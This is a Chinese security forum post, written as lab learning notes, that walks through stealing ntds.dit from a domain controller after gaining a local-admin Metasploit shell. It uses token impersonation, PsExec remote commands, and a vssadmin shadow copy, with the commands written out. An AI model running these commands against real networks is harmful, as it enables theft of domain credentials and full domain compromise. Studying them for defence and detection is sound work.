用户
搜索
  • TA的每日心情
    开心
    2019-1-7 10:08
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-脚本小子

    Rank: 2

    2

    主题

    16

    帖子

    21

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2018-8-14
    发表于 2020-5-21 23:33:19 12350
    本帖最后由 wanna222 于 2020-5-22 09:10 编辑

         大家好:
    在域环境中是否试过因为种种原因,无法反弹shell(比如说有网络防火墙做了策略),也无法获得域控的账号密码。现在假设有怎么一个环境:只获得一台域内主机的本地管理员权限的shell(msf),虽然域管理员登陆过这台主机,却有无法dump出hash或明文密码。

         好,现在让我来班门弄斧吧!(图片上传后变模糊了,P**ec64.exe也被自动打星号0.0)

        环境如下
        受控主机IP:192.168.42.139(适配器1)、192.168.1.3(适配器2)
        域控主机IP:192.168.1.1
        kali主机IP:192.168.42.129      (192.168.42.0/24与192.168.1.0/24相互间不互通)

    一、 获得一台主机本地用户管理权限后,进行令牌假冒,获取域管权限
    1.png

    二、通过msf上传P**ec64.exe工具到受控主机中
    2.png

    三、在受控主机中使用Ps执行命令,测试连通性
            
    先查看受控主机IP
    3.png

           命令:P**ec64.exe \\192.168.1.1 -h cmd /c "ipconfig >\\192.168.1.1\C$\11.txt"
    4.png

    四、检查一下该主机上是否有可用的C盘的卷影拷贝,列出可用卷影拷贝,由于不回显,需把输出重定向
           命令:
    P**ec64.exe \\192.168.1.1 -h cmd /c "vssadmin list shadows > \\192.168.1.1\C$\11.txt"
    5.png
            进入域控主机查看,内容显示,目标域控主机现在还没有C盘的卷影拷贝

    6.png

    五、创建C盘的卷影拷贝,这样我们就可以从中窃取ntds.dit文件和SYSTEM文件
           命令:
    P**ec64.exe \\192.168.1.1 -h cmd /c "vssadmincreate shadow /for=C: > \\192.168.1.1\C$\11.txt"
    7.png

    六、复制卷影中的ntds.dit到域主机的Temp目录
           命令:
    P**ec64.exe \\192.168.1.1 -h cmd /c "copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit  \\192.168.1.1\C$\Windows\Temp\"
    9.png

    七、再从域主机的Temp目录把ntds.dit复制到受控主机的Temp

    10.png

      进入受控主机Temp中查看,成功获取到域控上的ntds.dit
    11.png

    坑点:使用重定向输出或copy时,如果指定的是受控主机,则命令执行出错,例如
    12.png
    但命令 ipconfig > \\192.168.1.3\C$\11.txt在域控主机上执行时却能把输出重定向到受控主机上,此处还望各位大佬赐教
                                                                                            13.png

    最后:条条大路通罗马,此处只是提供一种特定环境下的思路,不新颖烂大街,权当学习笔记。



    感谢分享!!!
    剑未佩妥出门已是江湖
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册